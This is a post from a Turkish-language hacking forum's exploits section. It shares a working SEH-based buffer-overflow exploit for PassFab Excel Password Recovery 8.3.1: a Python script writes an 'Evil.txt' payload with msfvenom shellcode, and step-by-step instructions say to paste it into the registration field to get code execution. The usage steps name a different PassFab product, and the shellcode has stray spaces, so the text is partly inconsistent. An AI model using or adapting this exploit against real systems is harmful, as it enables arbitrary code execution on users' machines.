İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

PassFab Excel Password Recovery SEH Local Exploit

21-02-2019 18:11
#1
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
654
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
#Exploit Title/Exploit Başlığı: PassFab Excel Password Recovery SEH Local Exploit
# Date/Tarih: 31.01.19
# Exploit Author/Exploit Yazarı: Achilles
# Vendor Homepage/Yapımcı Sitesi: https://www.passfab.com/products/excel-password-recovery.html
# Software Link/Yazılımın Linki: https://www.passfab.com/downloads/passfab-excel-password-recovery.exe
# Version/Versiyon: 8.3.1
# Tested on/Test Edilen Sistem: Windows XP SP3

# 1.- Python kodunu çalıştırın: PassFab_RAR
# 2.- EVIL.txt yi açın ve içindekileri kopyalayın
# 3.- PassFab RAR Password Recovery i açın
# 4.- Yeni penceredeki sağ üstteki tuşa tıklayın
# 5.- EVIL.txt den kopyaladığınızı buraya yapıştırın: 'Licensed E-mail and Registration Code'
# 6.- 'Register' a tıklayın ve hesap makinesi kendiliğinden açılacak.



#!/usr/bin/env python
import struct

buffer = "\x41" * 260
NSEH = "\xeb\x06\x90\x90" #jmp short 6
SEH = struct.pack('<L',0x100674dd) #pop pop ret SoftwareLog.dll
nops = "\x90" * 20

#badchar \x00\
#msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python
buf = ""
buf += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\ x5d"
buf += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\ xc5"
buf += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\ xde"
buf += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\ xeb"
buf += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\ x32"
buf += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\ x84"
buf += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\ x27"
buf += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\ xe3"
buf += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\ xb5"
buf += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\ xc8"
buf += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\ xb3"
buf += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\ x78"
buf += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\ x15"
buf += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\ x3a"
buf += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\ x05"
buf += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\ x0b"
buf += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\ x26"
buf += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\ x82"
buf += "\x8e\x2a\x79\xdb"

payload = buffer + NSEH + SEH + nops + buf


try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"



Exploit Linki : https://cxsecurity.com/issue/WLB-2019020027
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE



Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı